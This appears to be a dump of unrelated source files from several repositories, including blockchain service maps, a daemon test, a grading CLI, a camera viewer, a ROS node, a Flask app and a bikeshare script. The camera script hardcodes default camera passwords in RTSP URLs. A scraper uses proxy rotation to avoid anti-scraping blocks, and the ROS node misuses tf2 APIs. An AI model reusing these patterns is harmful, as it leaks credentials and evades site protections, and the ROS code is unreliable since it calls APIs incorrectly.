def __init__(self, pos, direction, space):
"""
Create the photon with its initial attributes.
- pos: Vector (m)
- direction: UnitVector
- space: Space
"""
self.mass = 0
self.pos = pos
self.direction = direction
self.vel = self.direction*c
self.space = space
space.add(self)
def __repr__(self):
"""Return information about the point."""
return f'Photon(mass={self.mass}, pos={self.pos}, vel={self.vel})'
def copy(self, other):
"""Copy the important attributes from another photon."""
self.pos = other.pos
def step(self, timestep=TIMESTEP):
"""Step the point forward one timestep."""
self.step_pos(timestep=timestep)
class Body(Point):
"""A spherical body with a collision hitbox."""
def __init__(self, mass, radius, pos, vel, space):
"""
Create the body with its initial attributes.
- mass: float (kg)
- radius: float (m)
- pos: Vector (m)
- vel: Vector (m)
- space: Space
"""
self.mass = mass
self.radius = radius
self.pos = pos
self.vel = vel
self.space = space
s = Space()
bh = Point(float('Inf'), Vector(0, 0, 0), Vector(0, 0, 0), s)
photon = Photon(Vector(5000, 5000, 5000), UnitVector(1, 0, 0), s)
for i in range(1000):
s.step()
print(bh)
print(photon)
``` |
{
"source": "13thProgression/gold-blockchain",
"score": 3
} |
#### File: chia/util/service_groups.py
```python
from typing import Generator, KeysView
SERVICES_FOR_GROUP = {
"all": "gold_harvester gold_timelord_launcher gold_timelord gold_farmer gold_full_node gold_wallet".split(),
"node": "gold_full_node".split(),
"harvester": "gold_harvester".split(),
"farmer": "gold_harvester gold_farmer gold_full_node gold_wallet".split(),
"farmer-no-wallet": "gold_harvester gold_farmer gold_full_node".split(),
"farmer-only": "gold_farmer".split(),
"timelord": "gold_timelord_launcher gold_timelord gold_full_node".split(),
"timelord-only": "gold_timelord".split(),
"timelord-launcher-only": "gold_timelord_launcher".split(),
"wallet": "gold_wallet gold_full_node".split(),
"wallet-only": "gold_wallet".split(),
"introducer": "gold_introducer".split(),
"simulator": "gold_full_node_simulator".split(),
}
def all_groups() -> KeysView[str]:
return SERVICES_FOR_GROUP.keys()
def services_for_groups(groups) -> Generator[str, None, None]:
for group in groups:
for service in SERVICES_FOR_GROUP[group]:
yield service
def validate_service(service: str) -> bool:
return any(service in _ for _ in SERVICES_FOR_GROUP.values())
``` |
{
"source": "13thProgression/peas-blockchain",
"score": 3
} |
#### File: peas/util/service_groups.py
```python
from typing import KeysView, Generator
SERVICES_FOR_GROUP = {
"all": "peas_harvester peas_timelord_launcher peas_timelord peas_farmer peas_full_node peas_wallet".split(),
"node": "peas_full_node".split(),
"harvester": "peas_harvester".split(),
"farmer": "peas_harvester peas_farmer peas_full_node peas_wallet".split(),
"farmer-no-wallet": "peas_harvester peas_farmer peas_full_node".split(),
"farmer-only": "peas_farmer".split(),
"timelord": "peas_timelord_launcher peas_timelord peas_full_node".split(),
"timelord-only": "peas_timelord".split(),
"timelord-launcher-only": "peas_timelord_launcher".split(),
"wallet": "peas_wallet peas_full_node".split(),
"wallet-only": "peas_wallet".split(),
"introducer": "peas_introducer".split(),
"simulator": "peas_full_node_simulator".split(),
}
def all_groups() -> KeysView[str]:
return SERVICES_FOR_GROUP.keys()
def services_for_groups(groups) -> Generator[str, None, None]:
for group in groups:
for service in SERVICES_FOR_GROUP[group]:
yield service
def validate_service(service: str) -> bool:
return any(service in _ for _ in SERVICES_FOR_GROUP.values())
```
#### File: core/daemon/test_daemon.py
```python
from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found
``` |
{
"source": "13XxM1CHA3lxX37/artemis_cli",
"score": 3
} |
#### File: artemis_cli/detail/arg_parser.py
```python
import argparse
class ArgParser(argparse.ArgumentParser):
def __init__(self):
super(ArgParser, self).__init__(
description='A command-line application for tutors to more productively '
'grade programming excises on ArTEMiS')
sub_parsers = self.add_subparsers(
title='commands',
dest='command',
description='List of valid commands',
help='Additional help',
parser_class=argparse.ArgumentParser)
# repos
# syntax: ./artemis_cli.py repos -a w01h01 -s ge42abc
repos_parser = sub_parsers.add_parser('repos',
help='Downloads student exercise repositories')
repos_parser.add_argument('-a', '--assignment',
metavar='assignment',
required=True,
help='The assignment to be processed (e.g. w01h01)')
repos_parser.add_argument('-s', '--students',
metavar='tumId',
required=True,
nargs='+',
help='The students\' TUM ids (comma or space-separated) to be processed'
' (e.g. ge36feg, ba12sup, ...)')
# scores (not implemented yet)
# syntax: ./artemis_cli.py scores -a w01h01 -s ge42abc
"""
scores_parser = sub_parsers.add_parser('scores',
help='Get scores for students\' assignments [not yet implemented]')
scores_parser.add_argument('-a', '--assignment',
metavar='assignment',
help='The assignment to be processed (e.g. w01h01)')
scores_parser.add_argument('-s', '--students',
metavar='tumId',
nargs='+',
help='The students TUM ids to be processed (e.g. ge36feg ba12sup, ...)')
"""
# grade
# syntax: ./artemis_cli.py grade -a w01h01 -s ab43cde
# -score 80 -text "Gut gemacht"
# -positive "Kommentare" "Gute Dokumentation"
# -negative "Bitte auf Formatierung achten" "Autoformat nutzen"
result_parser = sub_parsers.add_parser('grade',
help='Submits grade for a student assignment')
result_parser.add_argument('-a', '--assignment',
metavar='assignment',
required=True,
help='The assignment to be processed (e.g. w01h01)')
result_parser.add_argument('-s', '--student',
required=True,
metavar='tum_id',
help='The student\'s TUM id to be processed (e.g. ge42abc)')
result_parser.add_argument('-score',
metavar='score',
required=True,
type=int,
help='The score (0-100) of the assignment (e.g. 80)')
result_parser.add_argument('-text',
required=True,
metavar='result_text',
help='The result text of the assignment (e.g. "Gut gemacht")')
result_parser.add_argument('-pos', '--positive',
metavar=('text', 'detail_text'),
nargs='+', # at least one
action='append',
help='A positive feedback consisting of Text and optionally one Detail Text '
'(e.g. "Dokumentation" ["Gute und akkurate Kommentare"])')
result_parser.add_argument('-neg', '--negative',
metavar=('text', 'detail_text'),
nargs='+', # at least one
action='append',
help='A negative feedback consisting of Text and optionally one Detail Text '
'(e.g."Formatierung" ["Bitte Autoformatierung benutzen"])')
# grades
# syntax:./ artemis_cli.py grades /path/to/gradebook.yml
grades_parser = sub_parsers.add_parser('grades',
help='Submits all grades of a specified gradebook file')
grades_parser.add_argument('-f', '--file',
metavar='gradebook_file',
required=True,
help='A gradebook file as generated by `artemis-cli repos ...` '
' with all grades that are to be uploaded to ArTEMiS entered')
# allows only one of the specified arguments
group = self.add_mutually_exclusive_group()
group.add_argument('-q', '--quiet', action='store_true', help='Print quiet')
group.add_argument('-v', '--verbose', action='store_true', help='Print verbose')
``` |
{
"source": "1411102509/INTELLIGENT-SECURITY-MONITORING-SYSTEM",
"score": 3
} |
#### File: INTELLIGENT-SECURITY-MONITORING-SYSTEM/Demo-VideoCapture/showManyWin.py
```python
import cv2
import time
import multiprocessing as mp
"""
Source: Yonv1943 2018-06-17
https://github.com/Yonv1943/Python/tree/master/Demo
"""
# rtsp://admin:[email protected]/Streaming/Channels/1
def image_put(q, ip, username, password):
url = "rtsp://{}:{}@{}/Streaming/Channels/1".format(username, password, ip)
cap = cv2.VideoCapture(url)
while True:
q.put(cap.read()[1])
q.get() if q.qsize() > 1 else time.sleep(0.01)
def image_get(q, window_name):
cv2.namedWindow(window_name, flags=cv2.WINDOW_FREERATIO)
while True:
frame = q.get()
cv2.imshow(window_name, frame)
cv2.waitKey(30)
if cv2.waitKey(30) & 0xff == ord('q'):
cv2.destroyWindow(window_name)
break
def run_multi_camera(cam_list):
mp.set_start_method(method='fork') # init
processes = []
for cam in cam_list:
queue = mp.Queue(maxsize=4)
processes.append(mp.Process(target=image_put, args=(queue, cam[0], cam[1], cam[2])))
processes.append(mp.Process(target=image_get, args=(queue, cam[0])))
for process in processes:
process.daemon = True
process.start()
for process in processes:
process.join()
if __name__ == '__main__':
ip_list = [["192.168.1.2","admin","admin12345678"],
["192.168.1.11","admin","admin12345678"],
["192.168.1.12","admin","admin12345678"],
["192.168.213.79","admin","abc<PASSWORD>"],
["192.168.213.76","admin","<PASSWORD>"],
["192.168.1.15","admin","admin12345678"]]
run_multi_camera(ip_list)
``` |
{
"source": "1411vi14/gym_ped_sim",
"score": 2
} |
#### File: turtlebot3_social/src/tfodom2actor.py
```python
import tf2_ros
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import SetModelState
import numpy as np
class MountTB2Ped(Node):
def __init__(self):
super().__init__('tf2defaultworld')
self.model_sub = self.create_subscription(
ModelStates,
"/gazebo/model_states",
self.callback,
1)
self.br = tf2_ros.TransformBroadcaster(self)
self.model_set = self.create_publisher(
ModelState, "/gazebo/set_model_state", 1)
self.tb3modelstate = ModelState()
self.tb3modelstate.model_name = "turtlebot3_burger"
#self.actor_name = rclpy.get_param("TB3_WITH_ACTOR")
self.actor_name = self.declare_parameter("TB3_WITH_ACTOR").value
def callback(self, data):
#tb3_idx = data.name.index("turtlebot3_burger")
actor_idx = data.name.index(self.actor_name)
#tb3_pose = data.pose[tb3_idx].position
#tb3_orien = data.pose[tb3_idx].orientation
# br.sendTransform((tb3_pose.x, tb3_pose.y, tb3_pose.z),
#(tb3_orien.x, tb3_orien.y, tb3_orien.z, tb3_orien.w),
# rclpy.Time.now(),
# "tb3",
# "default_world")
actor_pose = data.pose[actor_idx].position
actor_orien = data.pose[actor_idx].orientation
actor_pose.z = 0.0
quat_ = self.quat_trans(actor_orien)
#x = actor_orien.y
#z = actor_orien.x
#y = actor_orien.z
#actor_orien.y = actor_orien.x
#actor_orien.x = x
#actor_orien.y = y
#actor_orien.z = z
self.tb3modelstate.pose.position = actor_pose
self.tb3modelstate.pose.orientation = quat_
# self.model_set(self.tb3modelstate)
self.model_set.publish(self.tb3modelstate)
self.br.sendTransform((0, 0, 0),
(0, 0, 0, 1),
rclpy.Time.now(),
"odom",
self.actor_name)
def quat_trans(self, quat):
euler = tf2_ros.transformations.euler_from_quaternion(
(quat.x, quat.y, quat.z, quat.w))
quat_ = tf2_ros.transformations.quaternion_from_euler(
euler[0]-0.5*np.pi, euler[1], euler[2]-0.5*np.pi)
quat.x = quat_[0]
quat.y = quat_[1]
quat.z = quat_[2]
quat.w = quat_[3]
return quat
def main(args=None):
rclpy.init(args=args)
tf2defaultworld = MountTB2Ped()
tf2defaultworld.get_logger().info('Created node')
rclpy.spin(tf2defaultworld)
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
tf2defaultworld.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
``` |
{
"source": "1415140539/python",
"score": 3
} |
#### File: 1415140539/python/basicSpider.py
```python
import logging,sys
import time
import urllib,random
logger = logging.getLogger("testLogger1") #传递一个名字
# 定制一个Logger的输出格式
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
#创建日志:文件日志 终端日志
file_handler = logging.FileHandler("testLogger1.log")
file_handler.setFormatter(formatter)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
# 设置默认日志级别
logger.setLevel(logging.DEBUG) #值只记录>=DEBUG 的级别
#吧文件日志和终端日志添加到日志处理器中
logger.addHandler(file_handler)
logger.addHandler(console_handler)
PROXY_RANGE_MAX = 10
PROXY_RANGE_MIN = 1
def downHtml(url,headers = [],
proxy = {},
timeout = 10 ,
decodeInfo = "utf-8",
num_retries = 10):
"""
爬虫的get请求,考虑了UA等 http request head 部分设置
支持代理服务器配置
返回的状态码不是200,怎么处理
超时问题,及网页的编码格式
:param url:
:param headers:
:param proxy:
:param num_retries:
:return:
一般来说 使用UA池和代理服务器池相结合的方式来某个页面,
更加不容易被反爬
动态的调整服务器的使用策略
"""
html = None
if num_retries <= 0:
return html
#调整动态服务器
if random.randint(PROXY_RANGE_MIN,PROXY_RANGE_MAX) >= PROXY_RANGE:
logger.info("No Proxy")
proxy = None
proxy_handler = urllib.request.ProxyHandler(proxy)
opener = urllib.request.build_opener(proxy_handler)
opener.addheaders = headers
urllib.request.install_opener(opener)
try:
response = urllib.request.urlopen(url)
html = response.read().decode(decodeInfo)
return html
except UnicodeDecodeError:
logger.error("UnicodeDecodeError")
except urllib.error.URLError or urllib.error.HttpError as e:
logger.error("urllib error")
if hasattr(e,"code") and 400<= e.code < 500:
logger.error("Client error") # 客户端问题,通过分析日志来追踪
elif hasattr(e,"code") and 500 <= e.code < 600 :
html = downHtml( url ,
headers,
proxy,
timeout,
decodeInfo,
num_retries-1)
time.sleep(PROXY_RANGE) #休息的时间可以自己定义一个
except:
logger.error("Download error")
PROXY_RANGE = 2
if __name__ == "__main__":
url = "https://www.douban.com/doulist/3516235/"
headers = [("User-Agent",'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36')]
proxy = {"http":"172.16.17.32:9999"}
print(downHtml(url,headers,proxy))
logger.removeHandler(file_handler)
logger.removeHandler(console_handler)
``` |
{
"source": "1418185965/uiautomator2",
"score": 3
} |
#### File: uiautomator2/catcher/task.py
```python
import time
class Task(object):
def __init__(self, name):
self.name = name
self.period = None
self.d = None
self.device = None
self.applicationid = None
self.version_name = None
self.pid = None
self.interval = None
self.output = None
self.info_list = set([])
def execute(self):
pass
def add_info(self, info):
self.info_list.add(info)
info.task = self
def set_device(self, d):
self.d = d
class RandomTask(Task):
def __init__(self, name):
super().__init__(name)
self.duration = 0.0
def execute(self):
time.sleep(self.duration)
``` |
{
"source": "141Wonders/vimeoalbum-portfolio",
"score": 3
} |
#### File: 141Wonders/vimeoalbum-portfolio/main.py
```python
from flask import Flask, render_template
import vimeo, json
app = Flask(__name__)
client = vimeo.VimeoClient(
#API key SYNTAX GOES HERE
)
#function to get video link, name, and thumbail from a specified album
def decode_json_reel(client, id):
# Make the request to the server for the "/me" endpoint.
about_me = client.get('/me/albums/'+ id +'/videos?sort=manual', params={"fields": "name,link,pictures.sizes.link"})
# Make sure we got back a successful response.
assert about_me.status_code == 200
# convert response to json object
data_encoded = json.dumps(about_me.json())
# decode the json encoded object
data_decoded = json.loads(data_encoded)
# initialize video data as list of dictionaries
video_data = data_decoded["data"]
return video_data
# returns a list of dictionaries, each dictionary represents a video's data
#function to get ONLY thumbnails from gallery directory album
def decode_json_album(client, id):
about_me = client.get('/me/albums/' + id + '/videos?sort=manual', params={"fields": "pictures.sizes.link"})
# Make sure we got back a successful response.
assert about_me.status_code == 200
# convert response to json object
data_encoded = json.dumps(about_me.json())
# decode the json encoded object
data_decoded = json.loads(data_encoded)
# initialize video data as list of dictionaries
video_data = data_decoded["data"]
return video_data
# returns a list of dictionaries, each dictionary represents a video's data
#function to extract 1920x1080 thumbnail size from GET request into a list
def get_thumbnails(json_list):
#initialize empty list for thumbnail data
thumbnail_list =[]
#this was a lil tricky, this loop connects each thumbnail with the corresponding video data
#We want to get the 1920x1080 image which is the last item in the list, so we use [-1] from the thumbnail list
for i in range(len(json_list)):
filtered = json_list[i]['pictures']
more_filter = filtered.get('sizes')
tn = more_filter[-1]['link']
thumbnail_list.append(tn)
return thumbnail_list
#Landing page of app, includes video data list & thumbail list
@app.route('/')
def landing():
main_result = decode_json_reel(client,'7693012')
reel_thumbnail_list = get_thumbnails(main_result)
#initialize main_result as a LIST of DICTIONARIES
return render_template('index.html', main_result=main_result, reel_thumbnail_list=reel_thumbnail_list)
#About Me page
@app.route('/about/')
def bio():
return render_template('generic.html')
#Campaign Directory, GET thumbnails from directory album
#page is made into a list, whichever album is picked gets redirected to the next app.route
@app.route('/campaigns/')
def campaigns():
album_result = decode_json_album(client,'9214209')
album_thumbnail_list = get_thumbnails(album_result)
album_result[0]['re_direct'] = "De-Viaje-con-los-Derbez"
album_result[1]['re_direct'] = "Juego-de-las-Llaves"
album_result[2]['re_direct'] = "ANA"
album_result[3]['re_direct'] = "Herederos-Por-Accidente"
album_result[4]['re_direct'] = "De-Brutas-Nada"
album_result[5]['re_direct'] = "R"
album_result[6]['re_direct'] = "I'll-Sleep-When-I'm-Dead"
album_result[7]['re_direct'] = "Maya-The-Bee"
return render_template('campaigns.html', album_result=album_result, album_thumbnail_list=album_thumbnail_list)
#Gets specified campagin route to show its corresponding campaign reel
@app.route('/campaigns/<campaign>/')
def front(campaign):
if campaign == "De-Viaje-con-los-Derbez":
pass_result = decode_json_reel(client,'9231645')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Juego-de-las-Llaves":
pass_result = decode_json_reel(client,'8246171')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Herederos-Por-Accidente":
pass_result = decode_json_reel(client,'8136339')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "De-Brutas-Nada":
pass_result = decode_json_reel(client,'8136337')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "R":
pass_result = decode_json_reel(client,'8136327')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Maya-The-Bee":
pass_result = decode_json_reel(client,'8136345')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "ANA":
pass_result = decode_json_reel(client,'8084695')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "I'll-Sleep-When-I'm-Dead":
pass_result = decode_json_reel(client,'8136342')
pass_thumbnail = get_thumbnails(pass_result)
return render_template('ind_campaign.html', pass_result=pass_result, pass_thumbnail=pass_thumbnail).format(campaign=campaign)
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "142342/Bikeshare-data-analysis",
"score": 3
} |
#### File: 142342/Bikeshare-data-analysis/bikeshare.py
```python
import time
import pandas as pd
import numpy as np
###############################################################################
############################ Requirements #####################################
# #1 Popular times of travel:
# - Most common month to travel
# - Most common day of week
# - Most common hour of the day
# #2 Popular stations and trips
# - Most common start station
# - Most common end station
# - Most common trip (same start and end stations)
# #3 Trip duration:
# - Total travel time
# - Average travel time
# #4 User information:
# - Counts of each user by type
# - Counts of each user by gender (NYC & Chicago only)
# - Earliest, latest, and most common year of birth for the users
################### Some questions to ask the user ############################
# 1 - Would you like to see data for Chicago, New York, or Washington?
# 2 - Would you like to filter the data by month, day or not at all?
# 2a - If by month, which month?
# 2b - If by day, which day?
###############################################################################
city_files = { 'chicago': 'chicago.csv',
'new york': 'new_york_city.csv',
'washington': 'washington.csv' }
city_keys = list(city_files.keys())
months = {'january': 1, 'february': 2, 'march': 3, 'april': 4, 'may': 5, 'june': 6}
months_key_list = list(months.keys())
months_val_list = list(months.values())
days = {'monday': 0, 'tuesday': 1, 'wednesday': 2, 'thursday': 3, 'friday': 4, 'saturday': 5, 'sunday': 6}
days_key_list = list(days.keys())
days_val_list = list(days.values())
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
print('Hello! Let\'s explore some US bikeshare data!')
# get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
city = input('Would you like to see data for Chicago, New York, or Washington?\n').strip().lower()
# handling inappropriate inputs for city name
while city not in city_keys:
city = input('City name not found, please enter Chicago, New York, or Washington instead.\n').strip().lower()
# get user input for month (all, january, february, ... , june)
month = input('Would you like to see data for January, February, March, April, May, or June?\n').strip().lower()
# handling inappropriate inputs for month name
while month not in months_key_list:
month = input('Month name not found, please enter a month from January to June, inclusively.\n').strip().lower()
# get user input for day of week (all, monday, tuesday, ... sunday)
day = input('Would you like to see data for Monday, Tuesday... or Sunday?\n').strip().lower()
# handling inappropriate inputs for day name
while day not in days_key_list:
day = input('Day name not found, please enter a day from Monday to Sunday, inclusively.\n').strip().lower()
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
# load data file into pandas dataframe
df = pd.read_csv(city_files.get(city))
# convert the Start Time to a to datetime format
# year is not needed, since they're all 2017
df['Start Time'] = pd.to_datetime(df['Start Time'], yearfirst = True)
#print(df)
# create new df with columns for month, day, weekday, and hour
fdf = df
fdf['month'] = df['Start Time'].dt.month
fdf['day'] = df['Start Time'].dt.weekday
fdf['hour'] = df['Start Time'].dt.hour
fdf['trip'] = "from " + df['Start Station'] + " to " + df['End Station']
# can also add more filter, based on the day of the month and so on.
#print(fdf['month'])
#By seeing the output, they're returned in numbers, hence the creation
#of dictionaries instead of lists for months and weekdays.
# filter df by month/day/both or none
#print(fdf)
return df, fdf
def time_stats(fdf):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
# display the most common month
mcm =fdf['month'].mode()[0] #most common month as an integer
month_position = months_val_list.index(mcm) #month's position
most_common_month = months_key_list[month_position].capitalize() #month's name
print("The most common month for travel is: " + most_common_month)
# display the most common day of week
mcd = fdf['day'].mode()[0] #most common day as an integer
day_position = days_val_list.index(mcd) #day's position
most_common_day = days_key_list[day_position].capitalize() #day's name
print("The most common day for travel is: " + most_common_day)
# display the most common start hour
most_common_hour = fdf['hour'].mode()[0] #most common hour as integer
print("The most common hour for travel is: " + str(most_common_hour) + ":00")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(fdf):
"""Displays statistics on the most popular stations and trip.
Args:
dataframe
"""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
# display most commonly used start station
mcus = fdf['Start Station'].mode()[0] # most common start station
print(mcus + " is the most common start station")
# display most commonly used end station
mces = fdf['End Station'].mode()[0] # most common end station
print(mces + " is the most common end station")
# display most frequent combination of start station and end station trip
mc_trip = fdf['trip'].mode()[0] # most common trip
print("The most common trip is " + mc_trip)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(fdf):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# display total travel time
duration_total = fdf['Trip Duration'].sum(skipna = True)
total_rounded = str(round(duration_total, 1))
print("Total trip durations are: " + total_rounded + " in seconds")
# display mean travel time
duration_mean = fdf['Trip Duration'].mean(skipna = True)
mean_rounded = str(round(duration_mean, 1))
print("The average trip duration period is: " + mean_rounded + " in seconds")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def appearance_count(fdf, column):
'''Calculates the
Args:
(dataframe) df, having valid data.
(str) column_name, name of the column for which the count of each type should be returned.
Returns:
Nothing
'''
print("Here is a count of the appearance of the unique elements in {}".format(column))
print(fdf[column].value_counts())
def user_stats(fdf, city):
"""Displays statistics on bikeshare users.
Args:
dataframe
Returns:
Nothing
"""
print('\nCalculating User Stats...\n')
start_time = time.time()
# Display counts of user types
appearance_count(fdf,'User Type')
print(city)
# Display counts of gender
if city == 'washington':
print("Gender and birth year data are unavailable for Washington")
else:
appearance_count(fdf, 'Gender')
# Display earliest, most recent, and most common year of birth
print("The oldest customer was born in: " + str(int(fdf['Birth Year'].min()))
+ ", the youngest was born in " + str(int(fdf['Birth Year'].max())) +
", while the most common birth year was " + str(int(fdf['Birth Year'].mode()[0])) )
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def print_filtered(fdf, month, months, day, days):
'''Continuously asks the user if he wants to see the raw data, showing 5
lines at a time.
Args:
Takes the dataframe, month, months, day, and days.
These have already been previously entered through get_filters().
Returns:
Nothing, but prints the dataframe 5 lines by 5 lines.
'''
#filtered = fdf[(fdf['month'] == month) & (fdf['day'] == day)]
#fdf = fdf[(fdf['month'] == month) & fdf['day'] == day]
accepted_inputs = ['yes', 'no']
m = months.get(month)
d = days.get(day)
view = str(input("Do you want to preview a section of the filtered DataFrame?\nAnswer with \'Yes\' or \'No\' \n")).lower().strip()
pd.set_option('display.max_columns',13)
if view == 'yes':
#print the first 5 rows upon the user's request
print("Below is the first 5 rows of the filtered DataFrame")
filtered = fdf[(fdf.month == m) & (fdf.day == d)]
print(filtered.iloc[:5, :])
start = 0
end = 5
view_again = str(input("\nWould you like to view 5 more rows?\nPlease answer with \'Yes\' or \'No\' \n")).lower().strip()
while view_again not in accepted_inputs:
view_again = input("Please enter an appropriate input; either \'Yes\' or \'No\' \n").lower().strip()
#the while loop to print until user does not want to continue
while view_again == 'yes':
start+=5
end+=5
print("\nBelow are the next 5 rows of the data")
print(filtered.iloc[start:end, :])
view_again = str(input("\nWould you like to view 5 more rows?\nPlease answer with \'Yes\' or \'No'\" \n")).lower().strip()
#checking for unacceptable inputs
while view_again not in accepted_inputs:
view_again = input("Please enter an appropriate input; either \'Yes\' or \'No\' \n").lower().strip()
else: print("You have chosen not to view any of the raw data")
def main():
while True:
city, month, day = get_filters()
df, fdf = load_data(city, month, day)
time_stats(fdf)
station_stats(fdf)
trip_duration_stats(fdf)
user_stats(fdf, city)
print_filtered(fdf, month, months, day, days)
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
``` |
{
"source": "1431241631/pyefun",
"score": 4
} |
#### File: pyefun/pyefun/arrayActionBase.py
```python
class 数组:
def __init__(self, data: list = []):
self.val = list(data)
def 加入成员(self, object):
self.val.append(object)
def 统计成员次数(self, object):
return self.val.count(object)
def 查找成员(self, object):
return self.val.index(object)
def 弹出成员(self, index: int = -1):
return self.val.pop(index)
def 插入成员(self, object, index: int = -1):
self.val.insert(index, object)
def 移除成员(self, object):
self.val.remove(object)
def 翻转(self):
self.val.reverse()
def 排序(self, **kwargs):
# cmp=None, key=None, reverse=False
# cmp -- 可选参数, 如果指定了该参数会使用该参数的方法进行排序。
# key -- 主要是用来进行比较的元素,只有一个参数,具体的函数的参数就是取自于可迭代对象中,指定可迭代对象中的一个元素来进行排序。
# reverse -- 排序规则,reverse = True 降序, reverse = False 升序(默认)。
self.val.sort(**kwargs)
def 从大到小(self, 下标=0):
pass
self.排序(reverse=True, key=lambda d: _func_key(d, 下标))
def 从小到大(self, 下标=0):
self.排序(reverse=False, key=lambda d: _func_key(d, 下标))
def 取所有成员(self):
return self.val
def 清空(self):
self.val = []
def _func_key(d, 下标=0):
if (type(d) == tuple):
return d[下标]
return d
def 字典_取值并删除(字典, 键, 失败返回值=None):
'如果查找键不存在则返回设置的失败返回值,该值可空'
return 字典.pop(键, 失败返回值)
def 字典_取指定键值(字典, 键, 失败返回值=None):
'如果查找键不存在则返回设置的失败返回值'
return 字典.get(键, 失败返回值)
def 字典_清空(字典):
'清空字典内的全部元素,成功返回True'
字典.clear()
return True
def 字典_拷贝(新字典, 原字典):
'成功返回True 直接赋值拷贝值会跟着原字典改变,用copy不会'
新字典 = 原字典.copy()
return True
def 字典_生成(键值列表, 键值):
'传入键值列表创建字典,字典内的值都为设置的键值'
return dict.fromkeys(键值列表, 键值)
def 字典_转列表(字典):
